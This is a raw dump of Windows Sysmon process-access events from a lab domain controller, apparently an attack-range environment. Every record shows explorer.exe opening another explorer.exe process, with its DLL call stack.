16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235462Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235461Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235460Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235459Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235458Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235457Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235456Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235455Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235454Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235453Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235452Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235451Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235450Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235449Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.575{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235448Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.575{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235447Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.575{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235446Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.575{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235445Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.575{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235444Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.575{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235443Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.575{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235442Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.575{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235441Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.575{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235440Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.575{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235439Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.575{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235438Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.575{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235437Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.575{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235436Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.575{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235435Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 